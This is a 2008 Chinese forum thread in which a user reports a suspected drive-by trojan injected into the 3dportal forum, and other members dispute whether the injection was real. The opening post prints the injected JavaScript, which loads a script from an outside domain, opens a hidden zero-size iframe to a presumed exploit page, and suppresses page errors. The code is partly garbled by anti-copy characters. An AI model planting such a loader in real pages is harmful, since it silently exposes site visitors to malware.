QQ登录

只需一步,快速开始

登录 | 注册 | 找回密码

三维网

 找回密码
 注册

QQ登录

只需一步,快速开始

展开

通知     

全站
3天前
查看: 2124|回复: 16
收起左侧

此网被挂马

[复制链接]
发表于 2008-11-26 14:38:57 | 显示全部楼层 |阅读模式 来自: 中国浙江金华

马上注册,结识高手,享用更多资源,轻松玩转三维网社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
马:Hack.Exploit.Script.JS.Mixed.c
  1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script>   c  a* N! g$ H: q( ~/ I+ y4 D
  2. / n* }7 |9 o2 L! o% z
  3. document.writeln("<script>";! W8 P* f+ o+ p" p
  4. document.writeln("function oK_Begin(){";
    2 }) g' C% ]/ ?) K$ R- {/ c2 y
  5. document.writeln("var Then = new Date() ";" A5 @& w9 X$ j- {5 \" J
  6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
    ) D* N4 Z! W" A& E% ?: X  c
  7. document.writeln("var cookieString = new String(document.cookie)";: h. U. _, _2 |% S3 J
  8. document.writeln("var cookieHeader = "Cookie1=" ";
    0 O: o- @( A) K4 a  I' |% P- v* |
  9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
    / @; J4 `$ k+ h1 H
  10. document.writeln("if (beginPosition != -1){ ";
    0 a* w0 R- \. M" w+ @
  11. document.writeln("} else ";( I6 D+ v- ]# C) ?
  12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";
    2 f$ l4 \+ g: e/ j
  13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";8 ?' h) u( B+ g; h9 I! ~
  14. document.writeln("}";) e: p' h: I+ I! M2 B- k
  15. document.writeln("}";0 Z/ g2 T: b3 k
  16. document.writeln("oK_Begin();";
    ; y- A6 B8 ]0 M
  17. document.writeln("<\/script>";; A/ P% j4 w- C
  18. document.writeln("<script>window.onerror=function(){return true;}<\/script>". z$ J3 w: U4 [6 _0 ~/ H) ^3 d9 K3 i
  19. - [3 j+ v/ l& Z7 W

  20. 4 Q+ w) D) S; r( l$ b3 Z

  21. " N0 Q; a& b8 t: e

  22. : l' o: ^; r) K8 Y1 O% W
  23. ) j! y9 ?0 ]5 W0 ~: H/ V7 {# b: v) \0 a
复制代码
虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马
发表于 2008-11-26 14:44:03 | 显示全部楼层 来自: 中国浙江宁波
请管理员确认是否网页挂马?
发表于 2008-11-26 14:47:52 | 显示全部楼层 来自: 中国江苏南京
我的麦咖啡都没检测出来 你什么杀毒软件?
 楼主| 发表于 2008-11-26 16:16:23 | 显示全部楼层 来自: 中国浙江金华

回复 3# cayuer 的帖子

不是杀软件查的.+ ?. Y; p$ W. c# v$ J) B; t8 O
只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
% Y% o; K$ D) j3 h* H不过,已经被清理了.
) U. s5 O6 v" F8 F' X9 N: @8 t- }" [7 i  r
HEHE
% V( w# g' m! h0 }; N) m( l. R0 o: b
[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]
发表于 2008-11-26 18:27:17 | 显示全部楼层 来自: 中国浙江温州
你这个什么网站,哪里出来的?# t& S; n" Z* ], G" a7 H6 v7 {
, h9 p% B8 x: X/ I$ O- d3 x
ht tp://u.cruze3.cn/u.js
 楼主| 发表于 2008-11-27 09:15:28 | 显示全部楼层 来自: 中国浙江金华

回复 5# 江南有雪 的帖子

http://u.cruze3.cn/u.js
& i: b& |/ x! [+ K& \此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.2 P9 T( p2 }- |7 r2 x
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.* A6 r5 E: Y" Y4 ^0 T, i, G
HEHE
发表于 2008-11-27 10:26:38 | 显示全部楼层 来自: LAN

回复 6# czy12 的帖子

这跟三维有什么关系?
 楼主| 发表于 2008-11-27 11:01:02 | 显示全部楼层 来自: 中国浙江金华
这是挂在三维网论坛里的.0 P# j! Y/ G" r/ i$ b1 }
红线所指
moma.jpg
发表于 2008-11-27 11:21:19 | 显示全部楼层 来自: 中国上海
奇怪,为什么我的里面没有?是不是楼主的机器自己带病毒了?
发表于 2008-11-27 11:26:10 | 显示全部楼层 来自: 中国甘肃兰州
自己的机子中毒了,就不要满天喊叫了,没人会认为你是一个杀毒的行家
 楼主| 发表于 2008-11-27 11:34:27 | 显示全部楼层 来自: 中国浙江金华
不学无术.
# c5 f8 |3 Y, xHEHE
mlm.jpg
发表于 2008-11-27 14:30:45 | 显示全部楼层 来自: 中国香港
但在:! L) w1 E' J9 A* m7 S/ P( g
http://www.3dportal.cn/discuz/ 之原
: ]+ x1 b3 ?: W& ~% }似乎看不见楼主所说的 http://u.cruze3.cn/u.js" c( N6 N6 n0 ]' E' ^9 g1 }

: y9 R: a7 F1 N: x) h: ]$ L' V[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]
发表于 2008-11-27 15:30:58 | 显示全部楼层 来自: 中国山东泰安
经过自编扫描代码处理结果,未发现楼主说的挂马代码!
7 p' `' ?9 q: c# A/ i. n4 x. |/ R, \* `; t; {
请清理自己计算机的缓冲区!
1.JPG
头像被屏蔽
发表于 2008-11-27 15:43:48 | 显示全部楼层 来自: 中国河北衡水
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2008-11-27 15:47:42 | 显示全部楼层 来自: 新加坡

回复 8# czy12 的帖子

看您的尾符/script,很像是U盘病毒。
 楼主| 发表于 2008-11-27 15:50:50 | 显示全部楼层 来自: 中国浙江金华
DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。4 M3 k( ]9 J4 }. u; G
我也说了:已修复。
/ K, A3 B- C5 G# E9 ]1 U/ u1 c% V' Q% O7 V$ e% X0 G
ps:这与缓存毫无关系。虽然缓存中有U.JS.$ O) {: S8 E5 d" z# D6 o
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?
: S( T8 i  A2 q6 F! A. R( C4 P+ i5 k! w, P
script是个JAVA代码,与U盘何关?
5 Z3 y7 B7 J) g6 z) l& M( Q
1 v6 F2 v/ z, E8 B4 I/ V- b1 ^7 MHEHE  D8 j3 D9 d' z4 k3 ?$ _8 H' ?" v
4 O* a9 D' x6 @3 g, `
[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]
发表于 2008-11-27 16:11:40 | 显示全部楼层 来自: 中国山东泰安
非也,代码是程序直接采样的当时的网页代码,是自编的,算不上权威,但是可以直接进入部分加密网站!
# o! N$ X1 M2 ~5 P6 v% A3 L* B9 i3 I* t3 @2 e
如果却如你说的修改了,我想,这只有论坛管理员有这个权限,即便是后台也是有记录的。假如确实是论坛后台修改了,一定会给大伙一个说法的。) T9 Z* {; {* z$ m, ]

8 i& t# s& t* O3 u8 l相反,目前从各方面提供的代码显示,确实“此时此刻”是正常的!至于继续讨论已经无大的价值!
发表回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Licensed Copyright © 2016-2020 http://www.3dportal.cn/ All Rights Reserved 京 ICP备13008828号

小黑屋|手机版|Archiver|三维网 ( 京ICP备2023026364号-1 )

快速回复 返回顶部 返回列表